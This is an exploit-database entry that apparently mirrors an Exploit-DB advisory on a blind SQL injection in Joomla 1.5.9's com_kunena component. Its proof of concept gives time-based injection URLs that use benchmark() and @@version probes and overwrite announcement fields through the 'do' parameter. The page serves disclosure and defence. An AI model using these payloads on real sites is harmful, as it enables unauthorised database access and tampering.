header-logo
Suggest Exploit
vendor:
Joomla
by:
B-HUNT3|2
5,5
CVSS
MEDIUM
SQL Injection
89
CWE
Product Name: Joomla
Affected Version From: 1.5.9
Affected Version To: Unknown
Patch Exists: NO
Related CWE: N/A
CPE: a:joomla:joomla
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: LocalHost
2020

Joomla (com_kunena) BLIND SQL Injection Vulnerability

Input var do is vulnerable to SQL Code Injection. It allows an attacker to execute arbitrary SQL queries. The vulnerability is confirmed in Joomla version 1.5.9 but probably other versions are also affected. The proof of concept involves sending a malicious SQL query to the vulnerable parameter do. The response time of the server can be used to determine if the query was successful or not.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.
Source

Exploit-DB raw data:

[~]>> ...[BEGIN ADVISORY]...

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

[~]>> TITLE: Joomla (com_kunena) BLIND SQL Injection Vulnerability
[~]>> LANGUAGE: PHP
[~]>> DORK: N/A
[~]>> RESEARCHER: B-HUNT3|2
[~]>> CONTACT: bhunt3r[at_no_spam]gmail[dot_no_spam]com
[~]>> TESTED ON: LocalHost

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

[~]>> DESCRIPTION: Input var do is vulnerable to SQL Code Injection
[~]>> AFFECTED VERSIONS: Confirmed in 1.5.9 but probably other versions also
[~]>> RISK: Medium/High
[~]>> IMPACT: Execute Arbitrary SQL queries

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

[~]>> PROOF OF CONCEPT:

[~]>> http://[HOST]/[JOOMLA_PATH]/index.php?option=com_kunena&Itemid=86&func=announcement&do=[SQL]

[~]>> {RETURN TRUE::RETURN FALSE} ---> VIEW TIME RESPONSE ||| HIGH: TRUE ||| LOW: FALSE

[~]>> http://server/[JOOMLA_PATH]/index.php?option=com_kunena&Itemid=86&func=announcement&do=show', link='0wn3d', task='0wn3d' WHERE userid=62 AND 1=if(substring(@@version,1,1)=5,benchmark(999999,md5(@@version)),1)/*
[~]>> http://server/[JOOMLA_PATH]/index.php?option=com_kunena&Itemid=86&func=announcement&do=show', link='0wn3d', task='0wn3d' WHERE userid=62 AND 1=if(substring(@@version,1,1)=4,benchmark(999999,md5(@@version)),1)/*

[~]>> Note: There are more affected vars.

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

[~]>> ...[END ADVISORY]...

Navigation

Suggest Exploit

Services By CQR